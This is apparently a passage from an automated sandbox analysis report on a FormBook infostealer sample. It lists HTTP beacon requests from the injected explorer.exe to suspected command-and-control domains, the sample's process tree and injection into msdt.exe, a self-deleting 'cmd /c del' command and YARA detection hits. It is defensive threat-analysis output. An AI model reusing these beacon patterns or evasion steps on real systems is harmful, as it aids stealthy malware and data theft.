                                                  CF-RAY: 69da64d2c8f74303-FRA
                                                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                  Data Raw: 31 34 31 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 65 76 65 72 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 41 63 63 65 73 73 20 64 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 2a 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 31 46 31 46 31 3b 66 6f 6e 74 2d 73 69 7a 65 3a 36 32 2e 35 25 3b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 7d 62 6f 64 79 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 2e 37 72 65 6d 7d 61 7b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 23 33 30 33 30 33 30 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 20 30 2e 32 73 20 65 61 73 65 2d 69 6e 7d 61 3a 68 6f 76 65 72 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 63 6f 6c 6f 72 3a 23 41 39 41 39 41 39 7d 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 38 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 6d 61 72 67 69 6e 3a 30 20 30 20 31 2e 34 72 65 6d 20 30 7d 70 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 7d 2e 70 61 67 65 7b 70 61 64 64 69 6e 67 3a 34 72 65 6d 20 33 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 76 68 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c
                                                  Data Ascii: 141d<!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <meta name="referrer" content="never" /> <title>Access denied</title> <style type="text/css"> *{box-sizing:border-box;margin:0;padding:0}html{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;background:#F1F1F1;font-size:62.5%;color:#303030;min-height:100%}body{padding:0;margin:0;line-height:2.7rem}a{color:#303030;border-bottom:1px solid #303030;text-decoration:none;padding-bottom:1rem;transition:border-color 0.2s ease-in}a:hover{border-bottom-color:#A9A9A9}h1{font-size:1.8rem;font-weight:400;margin:0 0 1.4rem 0}p{font-size:1.5rem;margin:0}.page{padding:4rem 3.5rem;margin:0;display:flex;min-height:100vh;flex-direction:col


                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                  1192.168.2.549768104.165.34.680C:\Windows\explorer.exe
                                                  TimestampkBytes transferredDirectionData
                                                  Oct 13, 2021 19:47:40.694370031 CEST5793OUTGET /fqiq/?ZvEd=prTEVkQtidVRbelnknUsCYHPcHrUQSHWronmvObfBYwGPcpLSCQwPhh2tosJT24FW2ZT&z0DH=f0Dtar1PYnAdDzS HTTP/1.1
                                                  Host: www.sanlifalan.com
                                                  Connection: close
                                                  Data Raw: 00 00 00 00 00 00 00
                                                  Data Ascii:
                                                  Oct 13, 2021 19:47:40.867327929 CEST5793INHTTP/1.1 200 OK
                                                  Server: nginx
                                                  Date: Wed, 13 Oct 2021 17:47:40 GMT
                                                  Content-Type: text/html
                                                  Content-Length: 781
                                                  Connection: close
                                                  Data Raw: 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e d5 d8 c7 ec c3 cc d6 c2 bd a8 b2 c4 d3 d0 cf de b9 ab cb be 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 67 62 32 33 31 32 22 20 2f 3e 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 28 66 75 6e 63 74 69 6f 6e 28 29 7b 0d 0a 20 20 20 20 76 61 72 20 62 70 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 0d 0a 20 20 20 20 76 61 72 20 63 75 72 50 72 6f 74 6f 63 6f 6c 20 3d 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 70 72 6f 74 6f 63 6f 6c 2e 73 70 6c 69 74 28 27 3a 27 29 5b 30 5d 3b 0d 0a 20 20 20 20 69 66 20 28 63 75 72 50 72 6f 74 6f 63 6f 6c 20 3d 3d 3d 20 27 68 74 74 70 73 27 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 62 70 2e 73 72 63 20 3d 20 27 68 74 74 70 73 3a 2f 2f 7a 7a 2e 62 64 73 74 61 74 69 63 2e 63 6f 6d 2f 6c 69 6e 6b 73 75 62 6d 69 74 2f 70 75 73 68 2e 6a 73 27 3b 0d 0a 20 20 20 20 7d 0d 0a 20 20 20 20 65 6c 73 65 20 7b 0d 0a 20 20 20 20 20 20 20 20 62 70 2e 73 72 63 20 3d 20 27 68 74 74 70 3a 2f 2f 70 75 73 68 2e 7a 68 61 6e 7a 68 61 6e 67 2e 62 61 69 64 75 2e 63 6f 6d 2f 70 75 73 68 2e 6a 73 27 3b 0d 0a 20 20 20 20 7d 0d 0a 20 20 20 20 76 61 72 20 73 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 22 73 63 72 69 70 74 22 29 5b 30 5d 3b 0d 0a 20 20 20 20 73 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 69 6e 73 65 72 74 42 65 66 6f 72 65 28 62 70 2c 20 73 29 3b 0d 0a 7d 29 28 29 3b 0d 0a 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 63 6f 6d 6d 6f 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 74 6a 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e
                                                  Data Ascii: <html xmlns="http://www.w3.org/1999/xhtml"><head><title></title><meta http-equiv="Content-Type" content="text/html; charset=gb2312" /><script>(function(){ var bp = document.createElement('script'); var curProtocol = window.location.protocol.split(':')[0]; if (curProtocol === 'https') { bp.src = 'https://zz.bdstatic.com/linksubmit/push.js'; } else { bp.src = 'http://push.zhanzhang.baidu.com/push.js'; } var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(bp, s);})();</script></head><script language="javascript" type="text/javascript" src="/common.js"></script><script language="javascript" type="text/javascript" src="/tj.js"></script></body></html>


                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                  2192.168.2.54976981.169.145.16180C:\Windows\explorer.exe
                                                  TimestampkBytes transferredDirectionData
                                                  Oct 13, 2021 19:47:45.919836998 CEST5794OUTGET /fqiq/?z0DH=f0Dtar1PYnAdDzS&ZvEd=cd5R1bQkGt60ucaw3I3E0k/wUnqrUWXrQueIKe7m3jIZGD6slZfTAntz2qvR4Gb0BO+l HTTP/1.1
                                                  Host: www.floaterslaser.com
                                                  Connection: close
                                                  Data Raw: 00 00 00 00 00 00 00
                                                  Data Ascii:
                                                  Oct 13, 2021 19:47:45.938915014 CEST5795INHTTP/1.1 404 Not Found
                                                  Date: Wed, 13 Oct 2021 17:47:45 GMT
                                                  Server: Apache/2.4.51 (Unix)
                                                  Content-Length: 196
                                                  Connection: close
                                                  Content-Type: text/html; charset=iso-8859-1
                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                  3192.168.2.54977364.190.62.11180C:\Windows\explorer.exe
                                                  TimestampkBytes transferredDirectionData
                                                  Oct 13, 2021 19:47:51.203907013 CEST5807OUTGET /fqiq/?ZvEd=oM7C4s4K9Ux9NUwG97tedYlymorHgm5Kv3Umj1Gnv/i5ubiDMWU/+XDfdu3U3Pyuil7R&z0DH=f0Dtar1PYnAdDzS HTTP/1.1
                                                  Host: www.mambacustomboats.com
                                                  Connection: close
                                                  Data Raw: 00 00 00 00 00 00 00
                                                  Data Ascii:
                                                  Oct 13, 2021 19:47:51.249383926 CEST5809INHTTP/1.1 302 Found
                                                  date: Wed, 13 Oct 2021 17:47:51 GMT
                                                  content-type: text/html; charset=UTF-8
                                                  content-length: 0
                                                  x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_0iebMnn85rGPdDqIEJxeNy8gIbO6CRs7ZDHqhQVvU/PQfR/eAFVjJYiSzo9U0xPuetoM72JXq2vZLu3MQDBEFQ==
                                                  expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                  cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                  pragma: no-cache
                                                  last-modified: Wed, 13 Oct 2021 17:47:51 GMT
                                                  location: https://sedo.com/search/details/?partnerid=324561&language=e&domain=mambacustomboats.com&origin=sales_lander_1&utm_medium=Parking&utm_campaign=offerpage
                                                  x-cache-miss-from: parking-f666569bc-lfcv4
                                                  server: NginX
                                                  connection: close


                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                  4192.168.2.549789108.167.135.12280C:\Windows\explorer.exe
                                                  TimestampkBytes transferredDirectionData
                                                  Oct 13, 2021 19:48:01.554976940 CEST5851OUTGET /fqiq/?ZvEd=KZhYdxsAX/C25xiOpksKfhNe7DL7yKRLCy2J/73TfqSfqYhWOiYMofna8My9QnEOoaqj&z0DH=f0Dtar1PYnAdDzS HTTP/1.1
                                                  Host: www.esyscoloradosprings.com
                                                  Connection: close
                                                  Data Raw: 00 00 00 00 00 00 00
                                                  Data Ascii:
                                                  Oct 13, 2021 19:48:01.689186096 CEST5852INHTTP/1.1 503 Service Unavailable
                                                  Content-Type: text/html; charset=UTF-8
                                                  Content-Length: 884
                                                  Connection: close
                                                  P3P: CP="CAO PSA OUR"
                                                  Expires: Thu, 01 Jan 1970 00:00:00 GMT
                                                  Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                  Pragma: no-cache
                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 56 69 72 75 73 2f 53 70 79 77 61 72 65 20 44 6f 77 6e 6c 6f 61 64 20 42 6c 6f 63 6b 65 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 50 52 41 47 4d 41 22 20 43 4f 4e 54 45 4e 54 3d 22 4e 4f 2d 43 41 43 48 45 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 3c 73 74 79 6c 65 3e 0d 0a 20 20 23 63 6f 6e 74 65 6e 74 20 7b 0d 0a 20 20 20 20 62 6f 72 64 65 72 3a 33 70 78 20 73 6f 6c 69 64 23 61 61 61 3b 0d 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 3b 0d 0a 20 20 20 20 6d 61 72 67 69 6e 3a 31 2e 35 65 6d 3b 0d 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 31 2e 35 65 6d 3b 0d 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 0d 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 65 6d 3b 0d 0a 20 20 7d 0d 0a 20 20 68 31 20 7b 0d 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 33 65 6d 3b 0d 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 0d 0a 20 20 20 20 63 6f 6c 6f 72 3a 23 31 39 36 33 39 30 3b 0d 0a 20 20 7d 0d 0a 20 20 62 20 7b 0d 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 6e 6f 72 6d 61 6c 3b 0d 0a 20 20 20 20 63 6f 6c 6f 72 3a 23 31 39 36 33 39 30 3b 0d 0a 20 20 7d 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 23 65 37 65 38 65 39 22 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0d 0a 3c 68 31 3e 56 69 72 75 73 2f 53 70 79 77 61 72 65 20 44 6f 77 6e 6c 6f 61 64 20 42 6c 6f 63 6b 65 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 44 6f 77 6e 6c 6f 61 64 20 6f 66 20 74 68 65 20 76 69 72 75 73 2f 73 70 79 77 61 72 65 20 68 61 73 20 62 65 65 6e 20 62 6c 6f 63 6b 65 64 20 69 6e 20 61 63 63 6f 72 64 61 6e 63 65 20 77 69 74 68 20 63 6f 6d 70 61 6e 79 20 70 6f 6c 69 63 79 2e 20 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 79 6f 75 72 20 73 79 73 74 65 6d 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 69 66 20 79 6f 75 20 62 65 6c 69 65 76 65 20 74 68 69 73 20 69 73 20 69 6e 20 65 72 72 6f 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 3c 62 3e 46 69 6c 65 20 6e 61 6d 65 3a 3c 2f 62 3e 20 20 3c 2f 70 3e 0d 0a 3c 2f 64 69 76 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                  Data Ascii: <html><head><title>Virus/Spyware Download Blocked</title><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><META HTTP-EQUIV="PRAGMA" CONTENT="NO-CACHE"><meta name="viewport" content="initial-scale=1.0"><style> #content { border:3px solid#aaa; background-color:#fff; margin:1.5em; padding:1.5em; font-family:Tahoma,Helvetica,Arial,sans-serif; font-size:1em; } h1 { font-size:1.3em; font-weight:bold; color:#196390; } b { font-weight:normal; color:#196390; }</style></head><body bgcolor="#e7e8e9"><div id="content"><h1>Virus/Spyware Download Blocked</h1><p>Download of the virus/spyware has been blocked in accordance with company policy. Please contact your system administrator if you believe this is in error.</p><p><b>File name:</b> </p></div></body></html>


                                                  Code Manipulations

                                                  Statistics

                                                  Behavior

                                                  Click to jump to process

                                                  System Behavior

                                                  Analysis Process: divpCHa0h7.exe PID: 3240 Parent PID: 5928

                                                  General

                                                  Start time:19:45:59
                                                  Start date:13/10/2021
                                                  Path:C:\Users\user\Desktop\divpCHa0h7.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:'C:\Users\user\Desktop\divpCHa0h7.exe'
                                                  Imagebase:0x690000
                                                  File size:477696 bytes
                                                  MD5 hash:FDA0D823B262AC2B1BD76A2053C29692
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:.Net C# or VB.NET
                                                  Yara matches:
                                                  • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000001.00000002.267439269.0000000002AB1000.00000004.00000001.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.267848070.0000000003AB9000.00000004.00000001.sdmp, Author: Joe Security
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.267848070.0000000003AB9000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.267848070.0000000003AB9000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                  Reputation:low

                                                  Analysis Process: divpCHa0h7.exe PID: 5712 Parent PID: 3240

                                                  General

                                                  Start time:19:46:08
                                                  Start date:13/10/2021
                                                  Path:C:\Users\user\Desktop\divpCHa0h7.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Users\user\Desktop\divpCHa0h7.exe
                                                  Imagebase:0x140000
                                                  File size:477696 bytes
                                                  MD5 hash:FDA0D823B262AC2B1BD76A2053C29692
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:low

                                                  Analysis Process: divpCHa0h7.exe PID: 4132 Parent PID: 3240

                                                  General

                                                  Start time:19:46:08
                                                  Start date:13/10/2021
                                                  Path:C:\Users\user\Desktop\divpCHa0h7.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Users\user\Desktop\divpCHa0h7.exe
                                                  Imagebase:0x3a0000
                                                  File size:477696 bytes
                                                  MD5 hash:FDA0D823B262AC2B1BD76A2053C29692
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:low

                                                  Analysis Process: divpCHa0h7.exe PID: 2256 Parent PID: 3240

                                                  General

                                                  Start time:19:46:09
                                                  Start date:13/10/2021
                                                  Path:C:\Users\user\Desktop\divpCHa0h7.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Users\user\Desktop\divpCHa0h7.exe
                                                  Imagebase:0x400000
                                                  File size:477696 bytes
                                                  MD5 hash:FDA0D823B262AC2B1BD76A2053C29692
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.361762124.00000000005D0000.00000040.00020000.sdmp, Author: Joe Security
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.361762124.00000000005D0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.361762124.00000000005D0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000001.265367323.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000001.265367323.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000001.265367323.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.361396861.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.361396861.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.361396861.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.361951579.00000000009D0000.00000040.00020000.sdmp, Author: Joe Security
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.361951579.00000000009D0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.361951579.00000000009D0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                  Reputation:low

                                                  Analysis Process: explorer.exe PID: 3472 Parent PID: 2256

                                                  General

                                                  Start time:19:46:10
                                                  Start date:13/10/2021
                                                  Path:C:\Windows\explorer.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\Explorer.EXE
                                                  Imagebase:0x7ff693d90000
                                                  File size:3933184 bytes
                                                  MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000000.290893406.0000000006D39000.00000040.00020000.sdmp, Author: Joe Security
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000000.290893406.0000000006D39000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000000.290893406.0000000006D39000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000000.307316377.0000000006D39000.00000040.00020000.sdmp, Author: Joe Security
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000000.307316377.0000000006D39000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000000.307316377.0000000006D39000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                  Reputation:high

                                                  Analysis Process: msdt.exe PID: 6440 Parent PID: 2256

                                                  General

                                                  Start time:19:46:52
                                                  Start date:13/10/2021
                                                  Path:C:\Windows\SysWOW64\msdt.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Windows\SysWOW64\msdt.exe
                                                  Imagebase:0x2f0000
                                                  File size:1508352 bytes
                                                  MD5 hash:7F0C51DBA69B9DE5DDF6AA04CE3A69F4
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000F.00000002.520122597.0000000002760000.00000040.00020000.sdmp, Author: Joe Security
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000F.00000002.520122597.0000000002760000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000F.00000002.520122597.0000000002760000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000F.00000002.519918692.0000000002660000.00000040.00020000.sdmp, Author: Joe Security
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000F.00000002.519918692.0000000002660000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000F.00000002.519918692.0000000002660000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000F.00000002.517884800.0000000000610000.00000004.00000001.sdmp, Author: Joe Security
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000F.00000002.517884800.0000000000610000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000F.00000002.517884800.0000000000610000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                  Reputation:moderate

                                                  Analysis Process: cmd.exe PID: 6732 Parent PID: 6440

                                                  General

                                                  Start time:19:46:55
                                                  Start date:13/10/2021
                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:/c del 'C:\Users\user\Desktop\divpCHa0h7.exe'
                                                  Imagebase:0x150000
                                                  File size:232960 bytes
                                                  MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high

                                                  Analysis Process: conhost.exe PID: 6760 Parent PID: 6732

                                                  General

                                                  Start time:19:46:56
                                                  Start date:13/10/2021
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff7ecfc0000
                                                  File size:625664 bytes
                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high

                                                  Disassembly

                                                  Code Analysis

                                                  Reset < >